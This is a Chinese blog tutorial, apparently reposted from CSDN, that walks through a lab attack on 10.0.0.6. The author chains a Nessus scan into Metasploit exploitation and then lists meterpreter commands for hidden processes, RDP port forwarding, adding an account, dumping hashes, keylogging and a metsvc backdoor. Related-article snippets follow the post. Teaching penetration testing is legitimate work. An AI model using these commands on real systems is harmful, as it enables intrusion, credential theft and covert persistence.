Nessus+Metasploit

最新推荐文章于 2023-03-06 22:49:39 发布
最新推荐文章于 2023-03-06 22:49:39 发布
阅读量442 收藏 1
点赞数
文章标签: 网络
原文链接:http://www.cnblogs.com/BloodZero/p/4463277.html
版权

1、环境

受害者IP:10.0.0.6

2、攻击

首先使用Nessus进行扫描

 

扫描结果

 

我们将结果导出来,然后导入msfconsole中

 

使用vulns进行漏洞分析

 

 

查找对应的漏洞

 

使用漏洞进行攻击

 

这时候我们就获得了一个meterpreter

3、控制后门

测试是否是虚拟机:

 

迁移进程,防止当前进程被删除

 

 

 

ps:查看进程

migrate pid:迁移进程

execute –H –i –f cmd.exe:创建新进程,-H不可见,-i交互

getpid:获取进程号

getuid:查看权限

sysinfo:系统信息

端口转发

       portfwd add –l 5678 –p 3389 –r 10.0.0.6:将受害者的3389转发到本机5678

       run getgui –u hack –p hack:添加账户

       rdesktop –u hack –p hack 10.0.0.6:3389:如果转发了就连接本地

 

获取hash

 

键盘监听

keyscan_start:启动监听

keyscan_stop:停止

keyscan_dump:查看

  

后门一:metsvc

 

然后使用

 

我这里失败了,原因是tcp/ip状态为FIN_WAIT_2(跟网络环境有关,如果哪位大牛知道如何解决,请告诉我!)

转载于:https://www.cnblogs.com/BloodZero/p/4463277.html

aipei5098
关注
Nessus : 配合METASPLOIT
weiliang369的博客
03-04 349
启动NESSUS,启动MSF,启动MSF的时候要链接数据库 载入NESSUS插件: msf > load nessus [*] Nessus Bridge for Metasploit 1.1 [+] Type nessus_help for a command listing [*] Successfully loaded plugin: nessus msf > 你现在可以输入nessus_help 查看帮助鸟 然后链接数据库 nessus_connect 账号:密码@安装NES
Nessus配合Metasploit渗透
11-24
Nessus配合Metasploit渗透,内容精彩,绝对的干货,让你小白变大牛。
Metasploit(五)Nessus使用
u010680986的博客
09-05 1034
nessus是专用的漏洞扫描器,用于检测目标系统漏洞、错误配置和默认凭证 1.启动:打开msfconsole,输入load nessus nessus_help可以查看一些命令信息 2.本地主机的连接nessus_connect <user name>:<password>@localhost:8834 ok 3.连接成功后,用nessus_policy_list可以查看扫描策略,共四个扫描策略,外部网络扫描、内部网络扫描、web应用测试、支付卡行业 4.对目..
Kali Linux 学习日记4 -Metasploit(MSF)和 Nessus
最新发布
qq_46081990的博客
03-06 1343
为了利用一个vulnerability(系统存在的漏洞),通常需要一个exploit(利用漏洞的代码)。exploit可以利用vulnerability,提供目标主机的权限。exploit通常会向目标发送payload(攻击成功后向目标传递的恶意代码),以此来获取目标主机的权限。payload通常由exploit来传递到目标系统上。Metasploit是一个漏洞框架。全称为The Metasploit Framework,简称MSF。它允许使用者开发自己的漏洞脚本(ruby语言),然后进行测试。
MetasploitNessus成功入侵xp经验分享
如鹿渴慕泉水的专栏
04-29 9034
MetasploitNessus成功入侵xp经验分享 先http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code注册账号并下载Nessus的linunubuntu10.4版在bt5安装http://www.metasploit.com/下载Metasploit,也可用bt5自带的msfcons
Metasploit's Guide
07-19
此外,本书还会指导读者如何将Nmap、NeXpose和Nessus等工具与Metasploit集成,实现自动化的漏洞发现过程。Meterpreter是一个高级的shell,可以用来从网络内部发起进一步攻击。书还探讨了如何利用Metasploit的各种...
metasploit4.5加载nessus的方法
05-03
在探讨如何在Metasploit 4.5加载Nessus的方法之前,我们有必要了解Metasploit框架的基础知识以及Nessus扫描器的作用和原理。Metasploit是一个强大的渗透测试工具,被广泛应用于网络安全领域,它提供了一个模块化的...
Mastering Metasploit 2nd Edition
05-14
- 探讨了Metasploit与其他工具(如Nessus、Burp Suite等)的集成方法。 #### 结语 - 通过阅读《Mastering Metasploit 2nd Edition》,读者不仅可以学到如何使用Metasploit进行有效的渗透测试,还可以了解到最新的...
玩转Metasploit初级系列课程
08-15
Metasploit的`auxiliary/scanner`模块提供了多种扫描工具,例如Nmap、 Nessus等,可以帮助我们发现开放端口、服务版本等信息,为后续的漏洞利用做准备。 四、漏洞利用 Metasploit的精华在于其丰富的漏洞利用模块。...
Metasploit与漏洞扫描
MyDriverC
12-16 1万+
http://www.h3c.com.cn/About_H3C/Company_Publication/IP_Lh/2013/03/Home/Catalog/201307/790128_30008_0.htm 漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统进行访问或破坏。它会成为入侵者侵入系统和植入恶意软件的入口,影响系统用户的切身利益。漏洞与目标
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
kali:Nessus扫描漏洞并用msf利用攻击xp系统
qq_45747414的博客
11-23 5714
Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 3.进入开始扫描 在启动nessus过程遇到的问题: NOTICE: Nessus has detected that API access on this scanner is disabled. 这里尝试了使用指令/opt/nessus/sbin/nessuscli update --all ##
Metasploit Nessus、Nexpose笔记
only-ring的文档库
02-19 1623
在MSF里用这两款强大的漏洞扫描工具。 启动MSF请看上一篇文章:http://www.secsrc.org/archives/24 一、Nessus 使用Nessus 扫描完成后生成.nessus 格式的报告,导入到MSF: db_connect postgres:toor@127.0.0.1/msf db_import /tmp/nessus_report_Hos
Nessus结合metasploit复现MS17-010
W小哥
12-29 888
本机IP:192.168.212.129 靶机IP:192.168.212.128 一、nessus漏洞发现 第一步:用nessus扫描win7操作系统 (注意:win7操作系统在虚拟机钟,若扫描几秒钟就结束,则是物理机winpcap不是最新版问题,安装最新版即可,另外如果重置了虚拟网卡winpcap也得卸载重新安装,或者重启,不然nessus则找不到虚拟网卡) 登陆进nessus,进入如下界面...
Metasploit使用nessus进行扫描
qq_43776408的博客
10-31 1569
1.在此之前你需要安装Nessus的插件 因为kali本身有nessus,但没有Nessus服务 2.msfload nessus加载插件 3.nessus_connect 你注册时的用户名:你注册时的密码@127.0.0.1:8834 ok 出现successfully表明成功 4.列出服务器上已定义的所有扫描策略 nessus_policy_list 你会看到Policy ID 和n...
打造自己的Ubuntu渗透利器--msf、nessus安装
热门推荐
12306小哥
10-27 2万+
1.1 msf安装 msf在Ubuntu安装,打开Ubuntu下的命令行终端。建议在root权限下执行。 $sudo–i 1.打开终端,进入安装目录(安装目录不固定,个人意愿) $cd/opt 2.执行以下命令: $curlhttps://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/te
Metaspolit下如何使用Nessus
Assassin
07-26 4957
前面讲了在外面如何使用Nessus,但是bash下使用绝对是王道,有可能没有UI的界面和操作简便,但是需要的环境较为简单,还是学一下!1.登录!以及之前的准备当然,首先你还是需要先下载好Nessus,我的实验是发现不下载的话我无法开启一些列服务的,Metasploit应该只是调用了它的一个接口吧!(如果有错误欢迎指正!),具体需要如何配置请看我之前的文章 http://blog.csdn.net/
Metasploit 整理笔记
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值